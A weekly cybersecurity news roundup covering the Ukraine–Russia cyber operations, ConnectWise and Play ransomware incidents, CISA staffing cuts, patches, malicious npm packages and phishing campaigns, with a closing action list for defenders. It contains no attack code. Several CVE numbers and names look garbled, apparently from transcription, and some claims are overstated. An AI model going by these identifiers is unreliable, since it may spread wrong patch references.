Happy Friday, Security Gang!

What a wild week it's been in the cybersecurity world—and honestly, calling it "wild" might be the understatement of the year. We've witnessed Ukraine literally bombing Russian aircraft through cyber operations, watched CISA lose a third of its workforce while threats are exploding, and seen ransomware gangs like Play absolutely demolish nearly 900 organizations over three years.

If you thought 2024 was intense, buckle up because 2025 is proving that cyber warfare isn't just about stolen data anymore—it's about real bombs, real casualties, and real geopolitical consequences. From sophisticated nation-state campaigns reshaping international relations to romance scammers powered by AI and trafficked workers, this week's stories read like a Tom Clancy novel, except it's all happening right now.

So grab your weekend coffee (Turkish roast Nespresso preferred, naturally), settle in, and let's break down everything that went down this week in the cyber domain.

🌍 Nation-State Cyber Warfare

Ukraine's Strategic Cyber Operations Ukraine's military intelligence executed one of the most sophisticated cyber-enabled kinetic operations of the conflict, launching drone strikes over 2,700 miles deep into Russian territory. These weren't ordinary drone attacks—they successfully crippled one-third of Russia's long-range bomber fleet through complex cyber espionage that allowed Ukrainian forces to place and launch drones undetected. Drawing parallels to historical Mossad operations, this demonstrates how strategic cyber operations can set the stage for decisive physical strikes in modern warfare.

In a separate but related operation, Ukrainian intelligence (GUR) successfully breached Tupolev, the Russian aerospace and defense company responsible for developing supersonic strategic bombers. The hackers exfiltrated 4.4 gigabytes of classified information, including personnel records, internal management communications, procurement documents, engineer resumes, and minutes from closed meetings. Most significantly, Ukrainian sources revealed their hackers maintained persistent access to Tupolev's network for an extended period, using this foothold to gather intelligence for future operations against other Russian defense sector organizations. This represents a strategic intelligence coup that could influence future peace negotiations.

Iran's Regional Cyber Campaigns ESET researchers have attributed a new wave of cyber attacks targeting Kurdish and Iraqi government officials to Bladed Feline, assessed as a subcluster of the well-known Iranian nation-state group OilRig. This campaign reflects Iran's broader cyber warfare strategy in Iraq, where Tehran continues to exploit the power vacuum that has existed since Saddam Hussein's regime was overthrown in 2003.

The timing is particularly significant as these attacks target both the Iraqi government—which has been increasingly distancing itself from Iranian influence—and Kurdish officials who have historically maintained strong alliances with American forces. This cyber activity occurs against the backdrop of Iran's significantly weakened regional position following recent losses of influence and proxy forces in Lebanon, Gaza, and Syria.

China's Escalating Taiwan Tensions Chinese authorities have escalated their hybrid warfare campaign against Taiwan by issuing arrest warrants for twenty Taiwanese individuals, alleging they conducted sophisticated hacking operations against mainland Chinese systems on behalf of Taiwan's ruling Democratic Progressive Party. Police in Guangzhou claimed the group was led by someone named Ning Naoi, though specific details about the alleged crimes weren't disclosed, raising questions about the legitimacy of these charges.

Simultaneously, China imposed a complete ban on all commercial dealings with Sicuens International Company, officially labeling its owners as "hardcore Taiwan independence supporters." This dual approach—combining legal persecution with economic warfare—represents a significant escalation in China's campaign against Taiwan, demonstrating how cyber accusations are being weaponized as part of broader geopolitical strategy.

🔒 Major Breaches & Attacks

ConnectWise ScreenConnect Compromise ConnectWise confirmed a suspected nation-state attack on its ScreenConnect remote access platform, specifically affecting cloud-hosted environments. The breach was linked to CVE-2025-39035, an ASP.NET view state vulnerability that was actually patched back in April—highlighting the ongoing risk of unpatched systems. The exploit allowed attackers to achieve remote code execution by stealing machine keys, giving them broad access to victim environments.

What's particularly concerning is ConnectWise's limited transparency about the incident details, prompting widespread criticism from the cybersecurity community about their preparedness and communication strategy. Given that ScreenConnect is widely used by Managed Service Providers (MSPs) and IT management teams, this breach could have significant downstream impacts on thousands of organizations that rely on these tools for remote system administration.

Ransomware Surge Across Sectors Federal authorities issued a critical advisory revealing that the Play ransomware gang has become the most prolific ransomware operation of 2024, victimizing approximately 900 organizations over the past three years and continuing their destructive campaign through May 2025. The FBI and Australian Cyber Security Center updated their advisory to include new tactics, techniques, and procedures observed in recent attacks.

Initial access brokers working with Play have been systematically exploiting three specific vulnerabilities in Simple Help remote monitoring and management software (CVE-2024-5772, 5773, and 5726). When chained together, these vulnerabilities allow attackers to escalate privileges and execute arbitrary code. The group has developed sophisticated evasion techniques, including recompiling their ransomware for each individual attack and using unique email communications through GMX.de and web.de domains. Some victims have even reported receiving phone calls as part of the extortion process, showing how these criminals are combining digital and traditional pressure tactics.

Lee Enterprises, the prominent newspaper publisher, completed its forensic investigation following a ransomware attack that compromised personal information belonging to 39,779 individuals, including Social Security numbers. The Keylyn ransomware gang claimed responsibility, allegedly stealing 350 gigabytes of data and threatening to leak the information unless ransom demands were met. The company has offered affected victims twelve months of free credit monitoring and identity protection services while investigators continue monitoring dark web marketplaces for the stolen data.

Municipal & Healthcare Attacks A wave of ransomware attacks has devastated municipal services across multiple states. Durant, Oklahoma saw ransomware take down both city systems and the police department's network, though emergency services remained functional. Lorain County, Ohio experienced a more severe impact, with courts and public services knocked offline, affecting over 315,000 residents. In Puerto Rico, a cyberattack against the Department of Justice forced the suspension of criminal background check services, creating significant delays in legal proceedings.

These incidents highlight the chronic under-resourcing of municipal IT infrastructure and the dangerous lack of network segmentation that continues to plague many government systems. The attacks demonstrate how cybercriminals are increasingly targeting local governments, knowing they often lack robust cybersecurity defenses and backup systems.

Covenant Health confirmed a cyberattack disrupted data access at three hospitals in Maine and New Hampshire, including St. Joseph and St. Mary's. While IT systems remain offline, clinical care continues using manual processes. This mirrors patterns seen in operational technology (OT) networks in the energy sector, where operations can persist despite data loss, though patient outcomes may be hindered by the lack of access to historical medical information. Surgeries and emergency treatments remain functional, while elective procedures have been delayed.

Retail & Financial Breaches Iconic French jeweler Cartier disclosed a data breach involving names, email addresses, and countries of residence of select clients. While the company emphasized that no passwords, financial data, or sensitive payment details were exposed, this attack follows a concerning string of retailer breaches affecting major brands like Adidas, Victoria's Secret, and Marks & Spencer, highlighting a troubling trend of cybercriminals specifically targeting consumer brands and their customer databases.

Main Street Bank reported a cyberattack via a third-party vendor that exposed personal data for roughly 5% of its customers. While the incident didn't materially impact bank operations, the institution immediately ceased all activities with the compromised provider. Details remain deliberately vague—it's unclear whether the contract termination is permanent or if the bank is conducting a thorough security review before resuming the relationship. This incident occurs amid increasing regulatory scrutiny on supply chain risks in the financial sector.

The North Face, owned by VF Corporation (which also owns Vans and Timberland), confirmed a credential stuffing attack that led to a breach of user data including full names, birthdates, email addresses, phone numbers, and detailed purchase histories. Fortunately, no passwords or payment information were stolen. The incident underscores the critical importance of implementing multi-factor authentication (MFA), especially for retail platforms where customer payment data and personal information are stored.

🏛️ Government & Regulatory

CISA Workforce Crisis A deeply concerning development has emerged regarding the Cybersecurity and Infrastructure Security Agency (CISA), which has lost approximately 1,000 employees—nearly one-third of its workforce—reducing total staff to around 2,200 through a combination of buyouts, early retirements, and layoffs. More than 600 employees departed in the most recent round as part of the Department of Homeland Security's workforce transition program, with insider sources suggesting the actual number approaches 700.

This reduction doesn't even include private contractors who ceased working for CISA following abrupt contract cancellations. The podcast host expressed serious concerns about the apparent lack of strategic direction from the current administration regarding CISA's future, emphasizing that cybersecurity requires highly specialized personnel and cannot operate as a lean organization given the rapidly escalating threat landscape. This workforce reduction comes at a time when cyber threats are more sophisticated and frequent than ever before.

Australia's Ransomware Reporting Law Australia has implemented a groundbreaking ransomware reporting requirement, mandating that victims report any ransom payments within 72 hours to the Australian Signals Directorate. Originally applicable only to entities earning over AU$3 million (~US$1.9 million), the updated law will expand to include many more organizations. Failure to comply could result in 60 penalty units in fines.

This legislative move addresses a critical intelligence gap—previously, only 1 in 5 ransomware incidents were reported to authorities, severely limiting government understanding of the threat landscape. While this seeks to improve threat visibility and enable better coordinated responses, the efficacy and administrative burden on businesses remain subjects of ongoing debate in the cybersecurity community.

UK's Cyber War Strategy The UK's Strategic Defense Review has unveiled unprecedented plans to integrate offensive cyber capabilities across all military branches in close collaboration with intelligence agencies including MI5, MI6, and GCHQ. This represents a fundamental shift in British defense policy, with the country publicly acknowledging its move toward active digital warfare operations.

This breaks from past norms of secrecy around cyber operations and signals that the UK views cyberspace as a legitimate domain for military action. The integration across traditional military branches suggests a recognition that future conflicts will be inherently hybrid, combining conventional military operations with sophisticated cyber attacks.

🛡️ Security Developments

Zero-Day Patches Released Google has issued critical security updates across multiple platforms. For Android, the company patched over 30 vulnerabilities, including CVE-2025-26443, a local privilege escalation flaw that notably doesn't require any user interaction—making it particularly dangerous for automated attacks. For Chrome, Google issued an emergency update addressing CVE-2025-5419, a JavaScript engine zero-day that is being actively exploited in the wild. The patch is available across all platforms, and users are strongly urged to update to the latest Chrome version immediately.

Qualcomm disclosed three zero-day vulnerabilities in its Adreno GPU drivers, affecting dozens of different chipsets used in smartphones and tablets worldwide. Two of these flaws can cause memory corruption through unauthorized GPU commands, while the third, CVE-2025-27038, involves a use-after-free error that could lead to arbitrary code execution. All issues have been patched, but users need to check for OEM firmware updates, which may take weeks or months to become available depending on their device manufacturer.

Law Enforcement Victories In a rare victory against the cybercrime ecosystem, Dutch authorities, with international support, successfully dismantled AVcheck—one of the largest counter-antivirus platforms used by criminals to test and refine malware before deploying it in real-world attacks. Operation Endgame resulted in the seizure of servers and databases, revealing email addresses linked to known ransomware gangs and other cybercriminal organizations.

While security experts acknowledge that another similar tool will likely emerge to replace AVcheck, this takedown represents a significant disruption to the malware development pipeline, potentially forcing criminals to deploy less-tested malware or seek alternative testing methods.

The Department of Justice successfully seized the BidenCash cybercrime marketplace, taking offline approximately 145 dark web and clear web domains. Despite being operational for less than a year, BidenCash became one of the top carding platforms after publishing 3.3 million stolen credit cards for free in February 2023 as a promotional strategy to attract customers. The marketplace served over 117,000 customers and facilitated the trade of more than 15 million payment card numbers, generating $17 million in revenue before its takedown.

Supply Chain Threats Security researchers have uncovered a wave of malicious packages distributed through popular software repositories including NPM, PyPI, and Ruby. These packages are designed to drain cryptocurrency wallets, delete entire codebases, and exfiltrate sensitive API tokens including Telegram authentication credentials.

Particularly concerning is that Socket noted the malicious Ruby gems were published by a threat actor using aliases Bùi nam, buidanhnam, and si_mobile—just days after Vietnam ordered a nationwide ban on the Telegram messaging app for allegedly failing to cooperate with government efforts to tackle fraud, drug trafficking, and terrorism.

Another set of malicious NPM packages (pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-prediction, ethereum-smart-contract, and env-process) have been engineered to steal between 80 to 85% of funds present in victims' Ethereum or Binance Smart Chain wallets using obfuscated JavaScript code. These malicious libraries have been downloaded hundreds of thousands of times, demonstrating the persistent dangers of unchecked open-source dependencies.

Hewlett Packard Enterprise disclosed eight critical vulnerabilities in its StoreOnce backup platform, including a critical authentication bypass rated CVSS 9.8. The full list includes remote code execution flaws, server-side request forgery, directory traversal vulnerabilities, and information disclosure issues. Given that backup systems are critical for ransomware recovery, these vulnerabilities represent a particularly attractive target for attackers. Administrators are urged to upgrade to version 4.3.11 immediately.

🎯 Sophisticated Attack Techniques

Phishing Evolution A sophisticated spear phishing campaign has emerged that impersonates Rothschild & Co recruiters to specifically target Chief Financial Officers using NetBird, a legitimate remote access tool. Victims receive carefully crafted phishing emails that redirect to Firebase-hosted pages utilizing encrypted CAPTCHAs, ultimately delivering remote access payloads to victim systems.

What makes this campaign particularly dangerous is that attackers are bypassing traditional security defenses by leveraging legitimate Remote Monitoring and Management (RMM) platforms including ConnectWise, LogMeIn, and SplashTop. This represents a significant evolution beyond basic email lures, showing how threat actors are adapting to use trusted business tools as attack vectors.

The emergence of ClickFix attacks represents another concerning evolution in social engineering. These attacks combine malware distribution with sophisticated psychological manipulation, exploiting MFA verification fatigue and using fake CAPTCHA pages to silently install malware. Attackers are specifically leveraging fake Cloudflare "humanness checks" that closely mimic the legitimate Turnstile system, weaponizing familiar security mechanisms that users have been trained to trust.

Google's Comm Campaign Warning Google's Threat Analysis Group has identified a sophisticated criminal operation called "Comm" that tricks companies into providing widespread access to their Salesforce applications. The criminals exploit Salesforce's legitimate Data Loader tool by impersonating IT support personnel and convincing employees to install modified Salesforce connected apps disguised as legitimate Data Loader versions.

This technique, designated as the UNC6040 campaign, has successfully targeted approximately twenty organizations and remains active. The operation allows criminals to directly exfiltrate sensitive customer and business data from Salesforce environments and move laterally through victims' cloud services and internal networks, potentially accessing everything from customer databases to financial records.

Insider Threats The arrest of Nathan Viles Latch, a civilian IT specialist working in the Defense Intelligence Agency's Insider Threat Division, highlights the growing problem of internal security risks even within the most secure government organizations. Latch was arrested for attempting to sell classified information to a foreign power, motivated by his disagreement with the Trump administration's policies.

He offered sensitive documents and intelligence products, exfiltrated data using a thumb drive, and even requested foreign citizenship in exchange for his cooperation. This case is particularly concerning because it demonstrates that even personnel specifically tasked with identifying insider threats can become threats themselves.

The Coinbase breach involving TaskUs, an Indian outsourcing firm, reveals critical cultural and oversight gaps in international business process outsourcing. One TaskUs agent was caught taking photographs of sensitive customer data on behalf of external attackers who had successfully bribed multiple employees. The incident led to an internal investigation and multiple terminations, but not before attackers accessed names, emails, partial Social Security numbers, transaction histories, and ID document scans of 70,000 Coinbase customers.

🌐 International Developments

UAE Banking Security Enhancement The United Arab Emirates Central Bank has issued a progressive directive requiring all financial institutions to eliminate weak authentication methods—specifically SMS and email-based one-time passwords—from all banking operations by March 26, 2026. This represents one of the most aggressive national moves toward stronger authentication mechanisms globally.

The directive demonstrates the UAE's commitment to cybersecurity leadership in the financial sector, recognizing that SMS-based two-factor authentication is vulnerable to SIM swapping attacks and email-based systems can be compromised through phishing. Banks will need to transition to more secure methods like app-based authenticators, hardware tokens, or biometric authentication systems.

Malaysian Official Compromise Malaysia's Home Minister experienced a significant security breach when his WhatsApp account was compromised and used to distribute phishing links to his contacts. While no victims reported financial losses, the incident follows a troubling pattern of similar attacks on government officials' communication platforms, including compromises of Telegram, Signal, and various social media accounts.

This incident highlights how SIM swapping and mobile-focused phishing remain top attack vectors for targeting high-profile individuals, and demonstrates the national security implications when senior government officials' communication channels are compromised.

German Privacy Enforcement German authorities have imposed a substantial €51.2 million fine on Vodafone for serious GDPR violations that included allowing third-party agents to engage in fraudulent customer contracts and maintaining insecure customer authentication systems on both their web portal and telephone hotline.

The fine breakdown includes €15 million for inadequate oversight of business partners and €30 million for technical security deficiencies. This case serves as a critical example for other organizations about the importance of properly vetting and monitoring business partners, as companies remain liable for GDPR violations committed by their agents and contractors.

📊 Industry Updates

Threat Actor Naming Initiative Microsoft and CrowdStrike are leading an industry-wide initiative to address the chaos caused by having over 1,700 conflicting names for the same threat actor groups. This naming confusion has severely hampered threat intelligence sharing and analysis across the cybersecurity community.

The podcast host playfully suggested a systematic approach: bears for Russian groups, pandas for Chinese actors, and cats for Iranian threats. Regardless of the specific naming convention adopted, this standardization effort represents a much-needed step toward improving clarity and coordination in threat intelligence sharing.

TrickBot Leadership Exposed German authorities have successfully identified Vitaliy Kovalev, a Russian national, as the founder and leader of the notorious TrickBot cybercriminal organization. TrickBot served as a central component in global ransomware campaigns and collaborated closely with other major malware families including Conti, BazarLoader, and numerous other criminal enterprises.

Operating under the aliases "Stern" and "Ben," Kovalev led an organization exceeding 100 active members responsible for malware infections, data theft, and financial fraud on a global scale. This identification represents a significant intelligence victory, though the practical impact may be limited given that Kovalev likely remains in Russian territory beyond the reach of Western law enforcement.

Honeywell Industrial Threat Report Honeywell's 2025 industrial cybersecurity threat report revealed alarming trends in attacks targeting operational technology (OT) environments. The report documented a staggering 3,000% increase in Ramnit malware infections during Q4 2024 alone, along with more than 1,800 unique malware threats detected through USB device scanning at industrial facilities.

Particularly concerning is the finding that ransomware incidents are increasingly impacting OT systems indirectly through IT system disruptions. Even when malware doesn't directly target operational technology, the increasing convergence of IT and OT networks often forces complete production shutdowns when IT systems are compromised, demonstrating how traditional network boundaries have become dangerously blurred in modern industrial environments.

✅ Action List for Security Leaders

Immediate Critical Actions:

• Patch Management Sprint: Review and immediately patch RMM and RDP tools, focusing specifically on ScreenConnect CVE-2025-39035, Android vulnerabilities, Chrome's JavaScript engine zero-day, and Qualcomm GPU drivers

• Play Ransomware Assessment: Conduct tabletop exercises based on Play ransomware tactics, techniques, and procedures, and specifically assess Simple Help RMM software vulnerabilities in your environment

• Supply Chain Vendor Audit: Rigorously evaluate third-party risk management protocols, especially for RMM tools, Salesforce integrations, and any outsourcing partners handling sensitive customer data

Strategic Risk Management:

• Authentication Modernization: Begin comprehensive planning to migrate away from SMS and email-based one-time password systems, following the UAE banking directive as a model for timeline and implementation

• Network Segmentation Review: Assess and improve network segmentation to prevent full-service disruptions from ransomware, particularly in municipal government and healthcare environments

• Insider Threat Enhancement: Strengthen insider threat detection capabilities with specific focus on monitoring for data exfiltration attempts and signs of ideological motivation, even within traditionally secure divisions

Policy & Training Development:

• Regulatory Compliance Planning: Build comprehensive internal response policies that comply with evolving ransomware disclosure laws, recognizing that Australia's model may expand globally

• Advanced Social Engineering Training: Implement enhanced awareness programs focusing on sophisticated phishing techniques using CAPTCHAs, IT impersonation scenarios, and attacks leveraging familiar security tools

• Executive Protection Programs: Prepare leadership teams for impersonation attacks and AI voice cloning threats, especially in high-profile organizational environments

Operational Security Improvements:

• Open Source Security: Lock down software supply chain dependencies and implement rigorous package integrity verification before deploying any code in production environments

• Cloud Security Review: Audit vendor and cloud platform access permissions, with particular attention to healthcare, finance, and critical infrastructure sectors

• Threat Intelligence Integration: Monitor security tooling for Play ransomware indicators, Comm campaign tactics, and implement unified threat actor naming conventions in intelligence feeds

Strategic Planning & Advocacy:

• Workforce Assessment: Evaluate cybersecurity staffing levels and budget allocations in light of CISA workforce reduction trends and increasing threat sophistication

• Children's Privacy Preparation: Review data handling practices for any youth-related data in anticipation of strengthened COPA requirements and increased regulatory scrutiny

• National Security Engagement: Advocate for clear and proactive national cyber defense strategies that include both offensive and defensive capabilities, and support expedited leadership confirmations at CISA and the White House

As cyber warfare increasingly intersects with kinetic military operations, phishing campaigns evolve to weaponize trusted security tools, and insider threats successfully breach even elite intelligence agencies, the cybersecurity landscape has never been more complex, interconnected, or critical to national and organizational security.

Stay Cyber Safe!